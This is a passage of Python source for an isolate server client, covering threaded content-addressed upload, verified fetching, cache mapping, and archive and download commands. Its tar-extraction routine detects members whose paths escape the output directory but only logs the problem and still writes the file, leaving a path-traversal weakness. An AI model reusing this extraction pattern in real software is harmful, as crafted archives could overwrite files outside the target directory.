if not self._aborted:
logging.warning('Aborting... It can take a while.')
self._aborted = True
def __enter__(self):
"""Context manager interface."""
assert not self._prev_sig_handlers, self._prev_sig_handlers
for s in (signal.SIGINT, signal.SIGTERM):
self._prev_sig_handlers[s] = signal.signal(s, lambda *_args: self.abort())
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Context manager interface."""
self.close()
while self._prev_sig_handlers:
s, h = self._prev_sig_handlers.popitem()
signal.signal(s, h)
return False
def upload_items(self, items):
"""Uploads a generator of Item to the isolate server.
It figures out what items are missing from the server and uploads only them.
It uses 3 threads internally:
- One to create batches based on a timeout
- One to dispatch the /contains RPC and field the missing entries
- One to field the /push RPC
    The main thread enumerates 'items' and pushes them to the first thread. It
    then joins all the threads, waiting for them to complete.
(enumerate items of Item, this can be slow as disk is traversed)
|
v
_create_items_batches_thread Thread #1
(generates list(Item), every 3s or 20~100 items)
|
v
_do_lookups_thread Thread #2
| |
v v
(missing) (was on server)
|
v
_handle_missing_thread Thread #3
|
v
(upload Item, append to uploaded)
Arguments:
items: list of isolate_storage.Item instances that represents data to
upload.
Returns:
List of items that were uploaded. All other items are already there.
"""
incoming = Queue.Queue()
batches_to_lookup = Queue.Queue()
missing = Queue.Queue()
uploaded = []
def _create_items_batches_thread():
"""Creates batches for /contains RPC lookup from individual items.
Input: incoming
Output: batches_to_lookup
"""
try:
batch_size_index = 0
batch_size = ITEMS_PER_CONTAINS_QUERIES[batch_size_index]
batch = []
while not self._aborted:
try:
item = incoming.get(True, timeout=3)
if item:
batch.append(item)
except Queue.Empty:
item = False
if len(batch) == batch_size or (not item and batch):
if len(batch) == batch_size:
batch_size_index += 1
batch_size = ITEMS_PER_CONTAINS_QUERIES[
min(batch_size_index, len(ITEMS_PER_CONTAINS_QUERIES)-1)]
batches_to_lookup.put(batch)
batch = []
if item is None:
break
finally:
# Unblock the next pipeline.
batches_to_lookup.put(None)
def _do_lookups_thread():
"""Enqueues all the /contains RPCs and emits the missing items.
Input: batches_to_lookup
Output: missing, to_upload
"""
try:
channel = threading_utils.TaskChannel()
def _contains(b):
if self._aborted:
raise Aborted()
return self._storage_api.contains(b)
pending_contains = 0
while not self._aborted:
batch = batches_to_lookup.get()
if batch is None:
break
self.net_thread_pool.add_task_with_channel(
channel, threading_utils.PRIORITY_HIGH, _contains, batch)
pending_contains += 1
while pending_contains and not self._aborted:
try:
v = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
pending_contains -= 1
for missing_item, push_state in v.items():
missing.put((missing_item, push_state))
while pending_contains and not self._aborted:
for missing_item, push_state in channel.next().items():
missing.put((missing_item, push_state))
pending_contains -= 1
finally:
# Unblock the next pipeline.
missing.put((None, None))
def _handle_missing_thread():
"""Sends the missing items to the uploader.
Input: missing
Output: uploaded
"""
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
channel = threading_utils.TaskChannel()
pending_upload = 0
while not self._aborted:
try:
missing_item, push_state = missing.get(True, timeout=5)
if missing_item is None:
break
self._async_push(channel, missing_item, push_state)
pending_upload += 1
except Queue.Empty:
pass
detector.ping()
while not self._aborted and pending_upload:
try:
item = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
while not self._aborted and pending_upload:
item = channel.next()
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
threads = [
threading.Thread(target=_create_items_batches_thread),
threading.Thread(target=_do_lookups_thread),
threading.Thread(target=_handle_missing_thread),
]
for t in threads:
t.start()
try:
# For each digest keep only first isolate_storage.Item that matches it.
# All other items are just indistinguishable copies from the point of view
# of isolate server (it doesn't care about paths at all, only content and
# digests).
seen = {}
try:
# TODO(maruel): Reorder the items as a priority queue, with larger items
      # being processed first. That is, before hashing the data.
# This must be done in the primary thread since items can be a
# generator.
for item in items:
if seen.setdefault(item.digest, item) is item:
incoming.put(item)
finally:
incoming.put(None)
finally:
for t in threads:
t.join()
logging.info('All %s files are uploaded', len(uploaded))
if seen:
_print_upload_stats(seen.values(), uploaded)
return uploaded
def _async_push(self, channel, item, push_state):
"""Starts asynchronous push to the server in a parallel thread.
Can be used only after |item| was checked for presence on a server with a
/contains RPC.
Arguments:
channel: TaskChannel that receives back |item| when upload ends.
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
None, but |channel| later receives back |item| when upload ends.
"""
# Thread pool task priority.
priority = (
threading_utils.PRIORITY_HIGH if item.high_priority
else threading_utils.PRIORITY_MED)
def _push(content):
"""Pushes an isolate_storage.Item and returns it to |channel|."""
if self._aborted:
raise Aborted()
self._storage_api.push(item, push_state, content)
return item
# If zipping is not required, just start a push task. Don't pass 'content'
# so that it can create a new generator when it retries on failures.
if not self.server_ref.is_with_compression:
self.net_thread_pool.add_task_with_channel(channel, priority, _push, None)
return
# If zipping is enabled, zip in a separate thread.
def zip_and_push():
# TODO(vadimsh): Implement streaming uploads. Before it's done, assemble
      # content right here. It will block until the whole file is zipped.
try:
if self._aborted:
raise Aborted()
stream = zip_compress(item.content(), item.compression_level)
data = ''.join(stream)
except Exception as exc:
logging.error('Failed to zip \'%s\': %s', item, exc)
channel.send_exception()
return
# Pass '[data]' explicitly because the compressed data is not same as the
# one provided by 'item'. Since '[data]' is a list, it can safely be
# reused during retries.
self.net_thread_pool.add_task_with_channel(
channel, priority, _push, [data])
self.cpu_thread_pool.add_task(priority, zip_and_push)
def push(self, item, push_state):
"""Synchronously pushes a single item to the server.
If you need to push many items at once, consider using 'upload_items' or
'_async_push' with instance of TaskChannel.
Arguments:
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
Pushed item (same object as |item|).
"""
channel = threading_utils.TaskChannel()
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT):
self._async_push(channel, item, push_state)
pushed = channel.next()
assert pushed is item
return item
def async_fetch(self, channel, priority, digest, size, sink):
"""Starts asynchronous fetch from the server in a parallel thread.
Arguments:
channel: TaskChannel that receives back |digest| when download ends.
priority: thread pool task priority for the fetch.
digest: hex digest of an item to download.
size: expected size of the item (after decompression).
sink: function that will be called as sink(generator).
"""
def fetch():
try:
# Prepare reading pipeline.
stream = self._storage_api.fetch(digest, size, 0)
if self.server_ref.is_with_compression:
stream = zip_decompress(stream, isolated_format.DISK_FILE_CHUNK)
# Run |stream| through verifier that will assert its size.
verifier = FetchStreamVerifier(
stream, self.server_ref.hash_algo, digest, size)
# Verified stream goes to |sink|.
sink(verifier.run())
except Exception as err:
logging.error('Failed to fetch %s: %s', digest, err)
raise
return digest
# Don't bother with zip_thread_pool for decompression. Decompression is
# really fast and most probably IO bound anyway.
self.net_thread_pool.add_task_with_channel(channel, priority, fetch)
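# Hedged usage sketch (hypothetical server URL, not executed): Storage is
# normally obtained through get_storage() further below and used as a context
# manager so its thread pools and signal handlers are cleaned up.
#
#   server_ref = isolate_storage.ServerRef(
#       'https://isolate.example.com', 'default-gzip')
#   with get_storage(server_ref) as storage:
#     uploaded = storage.upload_items(
#         [BufferItem(b'payload', server_ref.hash_algo)])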
class FetchQueue(object):
"""Fetches items from Storage and places them into ContentAddressedCache.
It manages multiple concurrent fetch operations. Acts as a bridge between
Storage and ContentAddressedCache so that Storage and ContentAddressedCache
don't depend on each other at all.
"""
def __init__(self, storage, cache):
self.storage = storage
self.cache = cache
self._channel = threading_utils.TaskChannel()
self._pending = set()
self._accessed = set()
self._fetched = set(cache)
# Pending digests that the caller waits for, see wait_on()/wait().
self._waiting_on = set()
# Already fetched digests the caller waits for which are not yet returned by
# wait().
self._waiting_on_ready = set()
def add(
self,
digest,
size=local_caching.UNKNOWN_FILE_SIZE,
priority=threading_utils.PRIORITY_MED):
"""Starts asynchronous fetch of item |digest|."""
# Fetching it now?
if digest in self._pending:
return
# Mark this file as in use, verify_all_cached will later ensure it is still
# in cache.
self._accessed.add(digest)
# Already fetched? Notify cache to update item's LRU position.
if digest in self._fetched:
# 'touch' returns True if item is in cache and not corrupted.
if self.cache.touch(digest, size):
return
logging.error('%s is corrupted', digest)
self._fetched.remove(digest)
# TODO(maruel): It should look at the free disk space, the current cache
# size and the size of the new item on every new item:
# - Trim the cache as more entries are listed when free disk space is low,
# otherwise if the amount of data downloaded during the run > free disk
# space, it'll crash.
# - Make sure there's enough free disk space to fit all dependencies of
# this run! If not, abort early.
# Start fetching.
self._pending.add(digest)
self.storage.async_fetch(
self._channel, priority, digest, size,
functools.partial(self.cache.write, digest))
def wait_on(self, digest):
"""Updates digests to be waited on by 'wait'."""
# Calculate once the already fetched items. These will be retrieved first.
if digest in self._fetched:
self._waiting_on_ready.add(digest)
else:
self._waiting_on.add(digest)
def wait(self):
"""Waits until any of waited-on items is retrieved.
    Once this happens, the item is removed from the waited-on set and returned.
    This function is called in two waves: the first wave is for HIGH priority
    items (the isolated files themselves), the second is for all the other
    files.
If the waited-on set is empty, raises RuntimeError.
"""
# Flush any already fetched items.
if self._waiting_on_ready:
return self._waiting_on_ready.pop()
assert self._waiting_on, 'Needs items to wait on'
# Wait for one waited-on item to be fetched.
while self._pending:
digest = self._channel.next()
self._pending.remove(digest)
self._fetched.add(digest)
if digest in self._waiting_on:
self._waiting_on.remove(digest)
return digest
# Should never reach this point due to assert above.
raise RuntimeError('Impossible state')
@property
def wait_queue_empty(self):
"""Returns True if there is no digest left for wait() to return."""
return not self._waiting_on and not self._waiting_on_ready
def inject_local_file(self, path, algo):
"""Adds local file to the cache as if it was fetched from storage."""
with fs.open(path, 'rb') as f:
data = f.read()
digest = algo(data).hexdigest()
self.cache.write(digest, [data])
self._fetched.add(digest)
return digest
@property
def pending_count(self):
"""Returns number of items to be fetched."""
return len(self._pending)
def verify_all_cached(self):
"""True if all accessed items are in cache."""
# Not thread safe, but called after all work is done.
return self._accessed.issubset(self.cache)
class FetchStreamVerifier(object):
"""Verifies that fetched file is valid before passing it to the
ContentAddressedCache.
"""
def __init__(self, stream, hasher, expected_digest, expected_size):
"""Initializes the verifier.
Arguments:
* stream: an iterable yielding chunks of content
* hasher: an object from hashlib that supports update() and hexdigest()
(eg, hashlib.sha1).
* expected_digest: if the entire stream is piped through hasher and then
summarized via hexdigest(), this should be the result. That is, it
should be a hex string like 'abc123'.
* expected_size: either the expected size of the stream, or
local_caching.UNKNOWN_FILE_SIZE.
"""
assert stream is not None
self.stream = stream
self.expected_digest = expected_digest
self.expected_size = expected_size
self.current_size = 0
self.rolling_hash = hasher()
def run(self):
"""Generator that yields same items as |stream|.
Verifies |stream| is complete before yielding a last chunk to consumer.
Also wraps IOError produced by consumer into MappingError exceptions since
otherwise Storage will retry fetch on unrelated local cache errors.
"""
# Read one chunk ahead, keep it in |stored|.
# That way a complete stream can be verified before pushing last chunk
# to consumer.
stored = None
for chunk in self.stream:
assert chunk is not None
if stored is not None:
self._inspect_chunk(stored, is_last=False)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
stored = chunk
if stored is not None:
self._inspect_chunk(stored, is_last=True)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
def _inspect_chunk(self, chunk, is_last):
"""Called for each fetched chunk before passing it to consumer."""
self.current_size += len(chunk)
self.rolling_hash.update(chunk)
if not is_last:
return
if ((self.expected_size != local_caching.UNKNOWN_FILE_SIZE) and
(self.expected_size != self.current_size)):
msg = 'Incorrect file size: want %d, got %d' % (
self.expected_size, self.current_size)
raise IOError(msg)
actual_digest = self.rolling_hash.hexdigest()
if self.expected_digest != actual_digest:
msg = 'Incorrect digest: want %s, got %s' % (
self.expected_digest, actual_digest)
raise IOError(msg)
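# Hedged standalone sketch (not executed): FetchStreamVerifier wraps any chunk
# iterator; here the expected digest and size are computed with hashlib.sha1
# for a tiny in-memory stream (in real use the hasher comes from
# server_ref.hash_algo).
#
#   import hashlib
#   _blob = b'abc'
#   _verifier = FetchStreamVerifier(
#       iter([_blob]), hashlib.sha1,
#       hashlib.sha1(_blob).hexdigest(), len(_blob))
#   assert b''.join(_verifier.run()) == _blob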
class IsolatedBundle(object):
"""Fetched and parsed .isolated file with all dependencies."""
def __init__(self, filter_cb):
"""
filter_cb: callback function to filter downloaded content.
When filter_cb is not None, Isolated file is downloaded iff
filter_cb(filepath) returns True.
"""
self.command = []
self.files = {}
self.read_only = None
self.relative_cwd = None
# The main .isolated file, a IsolatedFile instance.
self.root = None
self._filter_cb = filter_cb
def fetch(self, fetch_queue, root_isolated_hash, algo):
"""Fetches the .isolated and all the included .isolated.
It enables support for "included" .isolated files. They are processed in
strict order but fetched asynchronously from the cache. This is important so
that a file in an included .isolated file that is overridden by an embedding
.isolated file is not fetched needlessly. The includes are fetched in one
pass and the files are fetched as soon as all the ones on the left-side
of the tree were fetched.
The prioritization is very important here for nested .isolated files.
'includes' have the highest priority and the algorithm is optimized for both
deep and wide trees. A deep one is a long link of .isolated files referenced
one at a time by one item in 'includes'. A wide one has a large number of
'includes' in a single .isolated file. 'left' is defined as an included
.isolated file earlier in the 'includes' list. So the order of the elements
in 'includes' is important.
As a side effect this method starts asynchronous fetch of all data files
by adding them to |fetch_queue|. It doesn't wait for data files to finish
fetching though.
"""
self.root = isolated_format.IsolatedFile(root_isolated_hash, algo)
# Isolated files being retrieved now: hash -> IsolatedFile instance.
pending = {}
# Set of hashes of already retrieved items to refuse recursive includes.
seen = set()
# Set of IsolatedFile's whose data files have already being fetched.
processed = set()
def retrieve_async(isolated_file):
"""Retrieves an isolated file included by the root bundle."""
h = isolated_file.obj_hash
if h in seen:
raise isolated_format.IsolatedError(
'IsolatedFile %s is retrieved recursively' % h)
assert h not in pending
seen.add(h)
pending[h] = isolated_file
# This isolated item is being added dynamically, notify FetchQueue.
fetch_queue.wait_on(h)
fetch_queue.add(h, priority=threading_utils.PRIORITY_HIGH)
# Start fetching root *.isolated file (single file, not the whole bundle).
retrieve_async(self.root)
while pending:
# Wait until some *.isolated file is fetched, parse it.
item_hash = fetch_queue.wait()
item = pending.pop(item_hash)
with fetch_queue.cache.getfileobj(item_hash) as f:
item.load(f.read())
# Start fetching included *.isolated files.
for new_child in item.children:
retrieve_async(new_child)
# Always fetch *.isolated files in traversal order, waiting if necessary
# until next to-be-processed node loads. "Waiting" is done by yielding
# back to the outer loop, that waits until some *.isolated is loaded.
for node in isolated_format.walk_includes(self.root):
if node not in processed:
# Not visited, and not yet loaded -> wait for it to load.
if not node.is_loaded:
break
# Not visited and loaded -> process it and continue the traversal.
self._start_fetching_files(node, fetch_queue)
processed.add(node)
# All *.isolated files should be processed by now and only them.
all_isolateds = set(isolated_format.walk_includes(self.root))
assert all_isolateds == processed, (all_isolateds, processed)
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
# Extract 'command' and other bundle properties.
for node in isolated_format.walk_includes(self.root):
self._update_self(node)
self.relative_cwd = self.relative_cwd or ''
def _start_fetching_files(self, isolated, fetch_queue):
"""Starts fetching files from |isolated| that are not yet being fetched.
Modifies self.files.
"""
files = isolated.data.get('files', {})
logging.debug('fetch_files(%s, %d)', isolated.obj_hash, len(files))
for filepath, properties in files.items():
if self._filter_cb and not self._filter_cb(filepath):
continue
# Root isolated has priority on the files being mapped. In particular,
# overridden files must not be fetched.
if filepath not in self.files:
self.files[filepath] = properties
# Make sure if the isolated is read only, the mode doesn't have write
# bits.
if 'm' in properties and self.read_only:
properties['m'] &= ~(stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH)
# Preemptively request hashed files.
if 'h' in properties:
fetch_queue.add(
properties['h'], properties['s'], threading_utils.PRIORITY_MED)
def _update_self(self, node):
"""Extracts bundle global parameters from loaded *.isolated file.
Will be called with each loaded *.isolated file in order of traversal of
isolated include graph (see isolated_format.walk_includes).
"""
# Grabs properties.
if not self.command and node.data.get('command'):
# Ensure paths are correctly separated on windows.
self.command = node.data['command']
if self.command:
self.command[0] = self.command[0].replace('/', os.path.sep)
if self.read_only is None and node.data.get('read_only') is not None:
self.read_only = node.data['read_only']
if (self.relative_cwd is None and
node.data.get('relative_cwd') is not None):
self.relative_cwd = node.data['relative_cwd']
def get_storage(server_ref):
"""Returns Storage class that can upload and download from |namespace|.
Arguments:
server_ref: isolate_storage.ServerRef instance.
Returns:
Instance of Storage.
"""
assert isinstance(server_ref, isolate_storage.ServerRef), repr(server_ref)
return Storage(isolate_storage.get_storage_api(server_ref))
def _map_file(dst, digest, props, cache, read_only, use_symlinks):
"""Put downloaded file to destination path. This function is used for multi
threaded file putting.
"""
with tools.Profiler("_map_file for %s" % dst):
with cache.getfileobj(digest) as srcfileobj:
filetype = props.get('t', 'basic')
if filetype == 'basic':
# Ignore all bits apart from the user.
file_mode = (props.get('m') or 0o500) & 0o700
if read_only:
# Enforce read-only if the root bundle does.
file_mode &= 0o500
putfile(srcfileobj, dst, file_mode, use_symlink=use_symlinks)
elif filetype == 'tar':
basedir = os.path.dirname(dst)
with tarfile.TarFile(fileobj=srcfileobj, encoding='utf-8') as t:
ensured_dirs = set()
for ti in t:
if not ti.isfile():
logging.warning('Path(%r) is nonfile (%s), skipped', ti.name,
ti.type)
continue
# Handle files created on Windows fetched on POSIX and the
# reverse.
other_sep = '/' if os.path.sep == '\\' else '\\'
name = ti.name.replace(other_sep, os.path.sep)
fp = os.path.normpath(os.path.join(basedir, name))
if not fp.startswith(basedir):
logging.error('Path(%r) is outside root directory', fp)
ifd = t.extractfile(ti)
fp_dir = os.path.dirname(fp)
if fp_dir not in ensured_dirs:
file_path.ensure_tree(fp_dir)
ensured_dirs.add(fp_dir)
file_mode = ti.mode & 0o700
if read_only:
# Enforce read-only if the root bundle does.
file_mode &= 0o500
putfile(ifd, fp, file_mode, ti.size)
else:
raise isolated_format.IsolatedError('Unknown file type %r' % filetype)
def fetch_isolated(isolated_hash, storage, cache, outdir, use_symlinks,
filter_cb=None):
"""Aggressively downloads the .isolated file(s), then download all the files.
Arguments:
isolated_hash: hash of the root *.isolated file.
storage: Storage class that communicates with isolate storage.
cache: ContentAddressedCache class that knows how to store and map files
locally.
outdir: Output directory to map file tree to.
use_symlinks: Use symlinks instead of hardlinks when True.
filter_cb: filter that works as whitelist for downloaded files.
Returns:
IsolatedBundle object that holds details about loaded *.isolated file.
"""
logging.debug(
'fetch_isolated(%s, %s, %s, %s, %s)',
isolated_hash, storage, cache, outdir, use_symlinks)
# Hash algorithm to use, defined by namespace |storage| is using.
algo = storage.server_ref.hash_algo
fetch_queue = FetchQueue(storage, cache)
bundle = IsolatedBundle(filter_cb)
with tools.Profiler('GetIsolateds'):
# Optionally support local files by manually adding them to cache.
if not isolated_format.is_valid_hash(isolated_hash, algo):
logging.debug('%s is not a valid hash, assuming a file '
'(algo was %s, hash size was %d)',
isolated_hash, algo(), algo().digest_size)
path = six.text_type(os.path.abspath(isolated_hash))
try:
isolated_hash = fetch_queue.inject_local_file(path, algo)
except IOError as e:
raise isolated_format.MappingError(
            '%s doesn\'t seem to be a valid file. Did you intend to pass a '
'valid hash (error: %s)?' % (isolated_hash, e))
# Load all *.isolated and start loading rest of the files.
bundle.fetch(fetch_queue, isolated_hash, algo)
with tools.Profiler('GetRest'):
# Create file system hierarchy.
file_path.ensure_tree(outdir)
create_directories(outdir, bundle.files)
_create_symlinks(outdir, bundle.files.items())
# Ensure working directory exists.
cwd = os.path.normpath(os.path.join(outdir, bundle.relative_cwd))
file_path.ensure_tree(cwd)
# Multimap: digest -> list of pairs (path, props).
remaining = {}
for filepath, props in bundle.files.items():
if 'h' in props:
remaining.setdefault(props['h'], []).append((filepath, props))
fetch_queue.wait_on(props['h'])
# Now block on the remaining files to be downloaded and mapped.
logging.info('Retrieving remaining files (%d of them)...',
fetch_queue.pending_count)
last_update = time.time()
with threading_utils.ThreadPool(2, 32, 32) as putfile_thread_pool:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
while remaining:
detector.ping()
# Wait for any item to finish fetching to cache.
digest = fetch_queue.wait()
# Create the files in the destination using item in cache as the
# source.
for filepath, props in remaining.pop(digest):
fullpath = os.path.join(outdir, filepath)
putfile_thread_pool.add_task(threading_utils.PRIORITY_HIGH,
_map_file, fullpath, digest,
props, cache, bundle.read_only,
use_symlinks)
# Report progress.
duration = time.time() - last_update
if duration > DELAY_BETWEEN_UPDATES_IN_SECS:
msg = '%d files remaining...' % len(remaining)
sys.stdout.write(msg + '\n')
sys.stdout.flush()
logging.info(msg)
last_update = time.time()
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
putfile_thread_pool.join()
  # Save the cache right away to not lose the state of the new objects.
cache.save()
# Cache could evict some items we just tried to fetch, it's a fatal error.
if not fetch_queue.verify_all_cached():
free_disk = file_path.get_free_space(cache.cache_dir)
msg = (
'Cache is too small to hold all requested files.\n'
' %s\n cache=%dbytes, %d items; %sb free_space') % (
cache.policies, cache.total_size, len(cache), free_disk)
raise isolated_format.MappingError(msg)
return bundle
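# Hedged usage sketch (hypothetical hash, URL and output directory, not
# executed): fetch a whole isolated tree using an in-memory cache.
#
#   server_ref = isolate_storage.ServerRef(
#       'https://isolate.example.com', 'default-gzip')
#   with get_storage(server_ref) as storage:
#     bundle = fetch_isolated(
#         isolated_hash=u'deadbeef' * 5,  # hypothetical 40 char sha-1 digest
#         storage=storage,
#         cache=local_caching.MemoryContentAddressedCache(),
#         outdir=u'/tmp/isolated_out',
#         use_symlinks=False)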
def _directory_to_metadata(root, algo, blacklist):
"""Yields every file and/or symlink found.
Yields:
tuple(FileItem, relpath, metadata)
For a symlink, FileItem is None.
"""
# Current tar file bundle, if any.
root = file_path.get_native_path_case(root)
bundle = TarBundle(root, algo)
for relpath, issymlink in isolated_format.expand_directory_and_symlink(
root,
u'.' + os.path.sep,
blacklist,
follow_symlinks=(sys.platform != 'win32')):
filepath = os.path.join(root, relpath)
if issymlink:
# TODO(maruel): Do not call this.
meta = isolated_format.file_to_metadata(filepath, 0, False)
yield None, relpath, meta
continue
prio = relpath.endswith('.isolated')
if bundle.try_add(FileItem(path=filepath, algo=algo, high_priority=prio)):
# The file was added to the current pending tarball and won't be archived
# individually.
continue
# Flush and reset the bundle.
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
bundle = TarBundle(root, algo)
# Yield the file individually.
item = FileItem(path=filepath, algo=algo, size=None, high_priority=prio)
yield item, relpath, item.meta
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
def _print_upload_stats(items, missing):
"""Prints upload stats."""
total = len(items)
total_size = sum(f.size for f in items)
logging.info(
'Total: %6d, %9.1fkiB', total, total_size / 1024.)
cache_hit = set(items).difference(missing)
cache_hit_size = sum(f.size for f in cache_hit)
logging.info(
'cache hit: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_hit),
cache_hit_size / 1024.,
len(cache_hit) * 100. / total,
cache_hit_size * 100. / total_size if total_size else 0)
cache_miss = missing
cache_miss_size = sum(f.size for f in cache_miss)
logging.info(
'cache miss: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_miss),
cache_miss_size / 1024.,
len(cache_miss) * 100. / total,
cache_miss_size * 100. / total_size if total_size else 0)
def _enqueue_dir(dirpath, blacklist, hash_algo, hash_algo_name):
"""Called by archive_files_to_storage for a directory.
Create an .isolated file.
Yields:
FileItem for every file found, plus one for the .isolated file itself.
"""
files = {}
for item, relpath, meta in _directory_to_metadata(
dirpath, hash_algo, blacklist):
# item is None for a symlink.
files[relpath] = meta
if item:
yield item
  # TODO(maruel): If there's no file, don't yield an .isolated file.
data = {
'algo': hash_algo_name,
'files': files,
'version': isolated_format.ISOLATED_FILE_VERSION,
}
# Keep the file in memory. This is fine because .isolated files are relatively
# small.
yield BufferItem(
tools.format_json(data, True), algo=hash_algo, high_priority=True)
def archive_files_to_storage(storage, files, blacklist):
"""Stores every entry into remote storage and returns stats.
Arguments:
storage: a Storage object that communicates with the remote object store.
files: iterable of files to upload. If a directory is specified (with a
trailing slash), a .isolated file is created and its hash is returned.
Duplicates are skipped.
blacklist: function that returns True if a file should be omitted.
Returns:
tuple(OrderedDict(path: hash), list(FileItem cold), list(FileItem hot)).
The first file in the first item is always the .isolated file.
"""
# Dict of path to hash.
results = collections.OrderedDict()
hash_algo = storage.server_ref.hash_algo
hash_algo_name = storage.server_ref.hash_algo_name
# Generator of FileItem to pass to upload_items() concurrent operation.
channel = threading_utils.TaskChannel()
uploaded_digests = set()
def _upload_items():
results = storage.upload_items(channel)
uploaded_digests.update(f.digest for f in results)
t = threading.Thread(target=_upload_items)
t.start()
# Keep track locally of the items to determine cold and hot items.
items_found = []
try:
for f in files:
assert isinstance(f, six.text_type), repr(f)
if f in results:
# Duplicate
continue
try:
filepath = os.path.abspath(f)
if fs.isdir(filepath):
# Uploading a whole directory.
item = None
for item in _enqueue_dir(
filepath, blacklist, hash_algo, hash_algo_name):
channel.send_result(item)
items_found.append(item)
# The very last item will be the .isolated file.
if not item:
# There was no file in the directory.
continue
elif fs.isfile(filepath):
item = FileItem(
path=filepath,
algo=hash_algo,
size=None,
high_priority=f.endswith('.isolated'))
channel.send_result(item)
items_found.append(item)
else:
          raise Error('%s is neither a file nor a directory.' % f)
results[f] = item.digest
except OSError:
raise Error('Failed to process %s.' % f)
finally:
# Stops the generator, so _upload_items() can exit.
channel.send_done()
t.join()
cold = []
hot = []
for i in items_found:
# Note that multiple FileItem may have the same .digest.
if i.digest in uploaded_digests:
cold.append(i)
else:
hot.append(i)
return results, cold, hot
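# Hedged usage sketch (hypothetical server URL and paths, not executed): upload
# a file and a directory, then print "<hash> <path>" pairs the way CMDarchive
# does below.
#
#   server_ref = isolate_storage.ServerRef(
#       'https://isolate.example.com', 'default-gzip')
#   blacklist = tools.gen_blacklist(list(DEFAULT_BLACKLIST))
#   with get_storage(server_ref) as storage:
#     results, _cold, _hot = archive_files_to_storage(
#         storage, [u'/tmp/a_file.txt', u'/tmp/a_directory'], blacklist)
#   print('\n'.join('%s %s' % (h, f) for f, h in results.items()))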
@subcommand.usage('<file1..fileN> or - to read from stdin')
def CMDarchive(parser, args):
"""Archives data to the server.
  If a directory is specified, a .isolated file is created and the whole
  directory is uploaded. Then this .isolated file can be included in another
  one to run commands.
  The command outputs each file that was processed with its content hash. For
directories, the .isolated generated for the directory is listed as the
directory entry itself.
"""
add_isolate_server_options(parser)
add_archive_options(parser)
options, files = parser.parse_args(args)
process_isolate_server_options(parser, options, True, True)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
if files == ['-']:
files = (l.rstrip('\n\r') for l in sys.stdin)
if not files:
parser.error('Nothing to upload')
files = (f.decode('utf-8') for f in files)
blacklist = tools.gen_blacklist(options.blacklist)
try:
with get_storage(server_ref) as storage:
results, _cold, _hot = archive_files_to_storage(storage, files, blacklist)
except (Error, local_caching.NoMoreSpace) as e:
parser.error(e.args[0])
print('\n'.join('%s %s' % (h, f) for f, h in results.items()))
return 0
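# Hedged CLI sketch for CMDarchive (hypothetical server and paths):
#
#   python isolateserver.py archive \
#       -I https://isolate.example.com --namespace default-gzip \
#       /tmp/a_file.txt /tmp/a_directory
#
# One "<hash> <path>" line is printed per argument; a directory is represented
# by the hash of the .isolated file generated for it.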
def CMDdownload(parser, args):
"""Download data from the server.
It can either download individual files or a complete tree from a .isolated
file.
"""
add_isolate_server_options(parser)
parser.add_option(
'-s', '--isolated', metavar='HASH',
help='hash of an isolated file, .isolated file content is discarded, use '
'--file if you need it')
parser.add_option(
'-f', '--file', metavar='HASH DEST', default=[], action='append', nargs=2,
help='hash and destination of a file, can be used multiple times')
parser.add_option(
'-t', '--target', metavar='DIR', default='download',
help='destination directory')
parser.add_option(
'--use-symlinks', action='store_true',
help='Use symlinks instead of hardlinks')
add_cache_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported arguments: %s' % args)
if not file_path.enable_symlink():
logging.warning('Symlink support is not enabled')
process_isolate_server_options(parser, options, True, True)
if bool(options.isolated) == bool(options.file):
parser.error('Use one of --isolated or --file, and only one.')
if not options.cache and options.use_symlinks:
    parser.error('--use-symlinks requires the use of a cache with --cache')
cache = process_cache_options(options, trim=True)
cache.cleanup()
options.target = six.text_type(os.path.abspath(options.target))
if options.isolated:
if (fs.isfile(options.target) or
(fs.isdir(options.target) and fs.listdir(options.target))):
parser.error(
'--target \'%s\' exists, please use another target' % options.target)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
with get_storage(server_ref) as storage:
# Fetching individual files.
if options.file:
# TODO(maruel): Enable cache in this case too.
channel = threading_utils.TaskChannel()
pending = {}
for digest, dest in options.file:
dest = six.text_type(dest)
pending[digest] = dest
storage.async_fetch(
channel,
threading_utils.PRIORITY_MED,
digest,
local_caching.UNKNOWN_FILE_SIZE,
functools.partial(
local_caching.file_write, os.path.join(options.target, dest)))
while pending:
fetched = channel.next()
dest = pending.pop(fetched)
logging.info('%s: %s', fetched, dest)
# Fetching whole isolated tree.
if options.isolated:
bundle = fetch_isolated(
isolated_hash=options.isolated,
storage=storage,
cache=cache,
outdir=options.target,
use_symlinks=options.use_symlinks)
cache.trim()
if bundle.command:
        rel = os.path.join(options.target, bundle.relative_cwd)
        print('To run this test please run from the directory %s:' % rel)
print(' ' + ' '.join(bundle.command))
return 0
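# Hedged CLI sketches for CMDdownload (hypothetical server, hashes and
# destinations). --isolated and --file are mutually exclusive:
#
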